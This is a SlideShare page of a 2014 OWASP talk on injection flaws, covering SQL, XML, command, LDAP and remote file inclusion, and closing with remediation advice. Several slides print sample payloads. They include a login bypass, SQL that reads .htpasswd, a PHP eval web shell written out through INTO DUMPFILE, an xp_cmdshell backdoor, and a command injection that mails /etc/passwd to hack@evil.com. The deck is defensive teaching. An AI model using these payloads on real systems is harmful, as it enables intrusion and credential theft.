SlideShare a Scribd company logo

Owasp Top 10 A1: Injection

Download as PPTX, PDF
Michael Hendrickx, profile picture
Michael Hendrickx

This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.

Technology
Related topics:
IT Security
1 of 31
Downloaded 1,895 times
1
2
3
4
Most read
5
Most read
6
7
8
9
Most read
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Owasp A1: Injection 31 March 2014: Dubai, UAE
About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
• Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
Injection Fails Mix of “data” and “commands”.
IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.
Thank you! Michael Hendrickx me@michaelhendrickx.com @ndrix

More Related Content

PPTX
OWASP Top 10 2021 Presentation (Jul 2022)
TzahiArabov
 
PPTX
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
PPTX
SQL INJECTION
Anoop T
 
PPTX
Attacking thru HTTP Host header
Sergey Belov
 
PPT
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
PPT
SQL Injection
Adhoura Academy
 
PDF
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
PDF
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
Lenur Dzhemiliev
 
OWASP Top 10 2021 Presentation (Jul 2022)
TzahiArabov
 
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL INJECTION
Anoop T
 
Attacking thru HTTP Host header
Sergey Belov
 
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
SQL Injection
Adhoura Academy
 
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
Lenur Dzhemiliev
 

What's hot (20)

PPTX
Xss ppt
penetration Tester
 
PPTX
Sql injections - with example
Prateek Chauhan
 
PPTX
Sql injection
Zidh
 
PPTX
Vulnerabilities in modern web applications
Niyas Nazar
 
PDF
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
PPTX
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
PPTX
Understanding Cross-site Request Forgery
Daniel Miessler
 
PPTX
Command injection
penetration Tester
 
PPTX
Ppt on sql injection
ashish20012
 
PDF
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
PPT
A Brief Introduction in SQL Injection
Sina Manavi
 
PPTX
OWASP Top 10 2021 What's New
Michael Furman
 
PPTX
Waf bypassing Techniques
Avinash Thapa
 
PPT
Sql injection
Pallavi Biswas
 
PPT
Secure code practices
Hina Rawal
 
PPTX
Sql injection
Nuruzzaman Milon
 
PDF
SSRF workshop
Ivan Novikov
 
PPTX
Introduction to Malware Analysis
Andrew McNicol
 
PPTX
Owasp top 10 vulnerabilities
OWASP Delhi
 
PPTX
Directory Traversal & File Inclusion Attacks
Raghav Bisht
 
Xss ppt
penetration Tester
 
Sql injections - with example
Prateek Chauhan
 
Sql injection
Zidh
 
Vulnerabilities in modern web applications
Niyas Nazar
 
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
Understanding Cross-site Request Forgery
Daniel Miessler
 
Command injection
penetration Tester
 
Ppt on sql injection
ashish20012
 
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
A Brief Introduction in SQL Injection
Sina Manavi
 
OWASP Top 10 2021 What's New
Michael Furman
 
Waf bypassing Techniques
Avinash Thapa
 
Sql injection
Pallavi Biswas
 
Secure code practices
Hina Rawal
 
Sql injection
Nuruzzaman Milon
 
SSRF workshop
Ivan Novikov
 
Introduction to Malware Analysis
Andrew McNicol
 
Owasp top 10 vulnerabilities
OWASP Delhi
 
Directory Traversal & File Inclusion Attacks
Raghav Bisht
 
Ad

Similar to Owasp Top 10 A1: Injection (20)

PDF
Attques web
Tarek MOHAMED
 
PDF
The top 10 security issues in web applications
Devnology
 
PDF
null Bangalore meet - Php Security
n|u - The Open Security Community
 
PPTX
Sql Injection attacks and prevention
helloanand
 
PPTX
Application and Website Security -- Fundamental Edition
Daniel Owens
 
PDF
Web Application Security
Siarhei Barysiuk
 
PPSX
Web application security
www.netgains.org
 
PPTX
Secure Programming In Php
Akash Mahajan
 
PDF
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
PDF
Lets Make our Web Applications Secure
Aryashree Pritikrishna
 
PDF
Web Security 101
Michael Peters
 
PDF
My app is secure... I think
Wim Godden
 
ODP
Security In PHP Applications
Aditya Mooley
 
PDF
20111204 web security_livshits_lecture01
Computer Science Club
 
PPT
Php Security By Mugdha And Anish
OSSCube
 
PDF
Owasp Backend Security Project 1.0beta
Security Date
 
PDF
sql-inj_attack.pdf
ssuser07cf8b
 
PPTX
Web application security part 01
Prachi Gulihar
 
PPT
Advanced sql injection
badhanbd
 
PPTX
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat
 
Attques web
Tarek MOHAMED
 
The top 10 security issues in web applications
Devnology
 
null Bangalore meet - Php Security
n|u - The Open Security Community
 
Sql Injection attacks and prevention
helloanand
 
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Web Application Security
Siarhei Barysiuk
 
Web application security
www.netgains.org
 
Secure Programming In Php
Akash Mahajan
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
Lets Make our Web Applications Secure
Aryashree Pritikrishna
 
Web Security 101
Michael Peters
 
My app is secure... I think
Wim Godden
 
Security In PHP Applications
Aditya Mooley
 
20111204 web security_livshits_lecture01
Computer Science Club
 
Php Security By Mugdha And Anish
OSSCube
 
Owasp Backend Security Project 1.0beta
Security Date
 
sql-inj_attack.pdf
ssuser07cf8b
 
Web application security part 01
Prachi Gulihar
 
Advanced sql injection
badhanbd
 
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat
 
Ad

More from Michael Hendrickx (7)

PPTX
ECrime presentation - A few bits about malware
Michael Hendrickx
 
PPTX
The Cross Window redirect
Michael Hendrickx
 
PPTX
Social Engineering Trickx - Owasp Doha 2015
Michael Hendrickx
 
PPTX
Social Engineering - Help AG spotlight 15Q2
Michael Hendrickx
 
PPTX
Help AG spot light - social engineering
Michael Hendrickx
 
PPTX
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
PDF
Webpage Proxying
Michael Hendrickx
 
ECrime presentation - A few bits about malware
Michael Hendrickx
 
The Cross Window redirect
Michael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Michael Hendrickx
 
Social Engineering - Help AG spotlight 15Q2
Michael Hendrickx
 
Help AG spot light - social engineering
Michael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx
 
Webpage Proxying
Michael Hendrickx
 

Recently uploaded (20)

PDF
KodekX | Application Modernization Development
KodekX
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Approach and Philosophy of On baking technology
30anthuong17
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
KodekX | Application Modernization Development
KodekX
 
Teaching material agriculture food technology
LiaRayya
 
Approach and Philosophy of On baking technology
30anthuong17
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
Encapsulation theory and applications.pdf
gurumoop
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
A Presentation on Artificial Intelligence
memembruh336
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 

Owasp Top 10 A1: Injection

  • 1. Owasp A1: Injection 31 March 2014: Dubai, UAE
  • 2. About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
  • 3. • Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
  • 4. How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
  • 5. What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
  • 6. Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
  • 7. Injection Fails Mix of “data” and “commands”.
  • 8. IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
  • 9. SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
  • 10. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 11. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 12. SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
  • 13. SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
  • 14. SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
  • 15. SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
  • 16. HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
  • 17. HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
  • 18. XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
  • 19. XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
  • 20. Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
  • 21. Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
  • 22. LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
  • 23. LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
  • 24. Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
  • 25. Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
  • 26. Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
  • 27. Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
  • 28. Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
  • 29. Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
  • 30. Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.